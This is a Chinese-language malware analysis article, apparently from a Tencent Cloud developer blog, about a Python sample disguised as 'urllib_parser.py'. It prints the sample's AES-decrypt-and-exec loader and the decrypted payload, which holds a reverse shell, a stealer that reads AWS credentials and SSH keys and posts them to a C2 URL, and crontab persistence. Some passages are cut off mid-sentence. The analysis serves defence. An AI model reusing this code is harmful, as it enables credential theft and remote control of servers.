静态分析是在不运行代码的情况下，通过阅读代码、检查字符串和结构来理解其功能。

打开文件，首先看到大量无关的、从开源项目复制过来的代码，这是典型的

# 文件开头是大量无害的代码，例如：
import requests
import os
import sys
import base64
import json
from Crypto.Cipher import AES
import threading
import socket

# ... 几百行看似正常的网络请求、数据处理代码 ...

在翻越了大量无关代码后，我们发现了关键部分。恶意代码通常会被编码、加密或隐藏在条件语句中。

在某个函数深处，找到了一个经过Base64编码的字符串和一个AES解密例程。

def _decrypt_payload(encrypted_b64, key):
    """解密Payload的函数"""
    encrypted = base64.b64decode(encrypted_b64)
    cipher = AES.new(key, AES.MODE_ECB) # 使用ECB模式，不安全但简单
    decrypted = cipher.decrypt(encrypted)
    return decrypted.rstrip(b'\0') # 移除填充

# 硬编码的密钥和加密数据
aes_key = b'thisisamaliciouskey123' # 硬编码的AES密钥
encrypted_payload_b64 = "U2FsdGVkX1+...（很长一串Base64）..." # 加密的Payload

# 解密并执行
try:
    payload_code = _decrypt_payload(encrypted_payload_b64, aes_key).decode('utf-8')
    exec(payload_code) # 动态执行解密后的代码，这是非常恶意的行为！
except Exception as e:
    pass # 静默处理异常，避免暴露

发现2： 解密后的核心恶意行为

，编写一个解密脚本，成功还原出真正的Payload。

# --- 解密后获得的真实恶意代码 ---
import subprocess
import threading

C2_SERVER = "http://malicious-c2.com/api/report" # 命令与控制服务器

def reverse_shell():
    """反向Shell连接"""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("45.77.123.456", 4444)) # 攻击者的IP和端口
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        subprocess.call(["/bin/sh", "-i"])
    except:
        pass

def info_stealer():
    """信息窃取器"""
    stolen_data = {}
    
    # 1. 窃取系统信息
    stolen_data['hostname'] = os.uname().nodename
    stolen_data['user'] = os.getenv('USER')
    
    # 2. 窃取AWS凭证（如果存在）
    aws_cred_path = os.path.expanduser('~/.aws/credentials')
    if os.path.exists(aws_cred_path):
        with open(aws_cred_path, 'r') as f:
            stolen_data['aws_credentials'] = f.read()
            
    # 3. 窃取SSH私钥
    ssh_path = os.path.expanduser('~/.ssh/id_rsa')
    if os.path.exists(ssh_path):
        with open(ssh_path, 'r') as f:
            stolen_data['ssh_key'] = f.read()
    
    # 将窃取的数据发送到C2服务器
    try:
        import requests
        requests.post(C2_SERVER, json=stolen_data, timeout=10)
    except:
        pass

def persist():
    """持久化：添加到crontab"""
    try:
        # 获取当前脚本的绝对路径
        current_file = os.path.abspath(__file__)
        # 构造cron任务，每分钟执行一次
        cron_cmd = f"* * * * * /usr/bin/python3 {current_file}\n"
        subprocess.call(f'(crontab -l ; echo "{cron_cmd}") | crontab -', shell=True)
    except:
        pass

# 启动所有恶意模块
if __name__ == "__main__":
    t1 = threading.Thread(target=reverse_shell)
    t2 = threading.Thread(target=info_stealer)
    t3 = threading.Thread(target=persist)
    
    t1.start()
    t2.start()
    t3.start()

在隔离的沙箱环境（如虚拟机）中运行该样本，并使用监控工具进行观察。

 是一个功能完整的、多模块的恶意软件，其主要恶意行为包括：

实战：一次Python恶意样本“urllib_parser.py”的分析

产品KOL

安全

编程语言

操作系统

Linux服务器发现伪装成Python标准库的恶意脚本urllib_parser.py，包含信息窃取、反向Shell和持久化功能。恶意代码通过AES加密隐藏，窃取AWS凭证、SSH密钥等敏感数据并发送至C2服务器。建议立即删除文件、轮换凭证并加强服务器安全监控。

安全审计

文件系统

服务器

虚拟机

防火墙

Python

Linux

4核4G3M云服务器 新用户低至38元/年！

11.11畅享AI算力 云启新增长

tcap

文章

问答

视频

学习中心

腾讯云实验室

直播

竞赛

腾讯云代码分析专区

腾讯iOA零信任安全管理系统专区

腾讯云架构师技术同盟交流圈

腾讯云数据库专区

腾讯云顾问专区

腾讯云原生专区

腾讯混元专区

腾讯云TCE专区

腾讯云Lighthouse专区

腾讯云HAI专区

腾讯云Edgeone专区

腾讯云存储专区

腾讯云智能专区

腾讯轻联专区 

腾讯云开发专区

TAPD专区

腾讯轻量云游戏服专区

腾讯云最具价值专家

腾讯云架构师技术同盟

腾讯云创作之星

腾讯云开发者先锋

腾讯云代码助手

云原生构建

TAPD 敏捷项目管理

Cloud Studio

SDK中心

API中心

命令行工具

涵盖代码开发、场景应用、自动测试全流程，助你从零构建专属AI助手

一站式MCP教程库，解锁AI应用新玩法

聚焦“写作效率、视觉美观与运行性能”三方面进行全面升级，为您提供更高效、稳定的创作环境

实战：一次Python恶意样本“urllib_parser.py”的分析

实战：一次Python恶意样本“urllib_parser.py”的分析

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐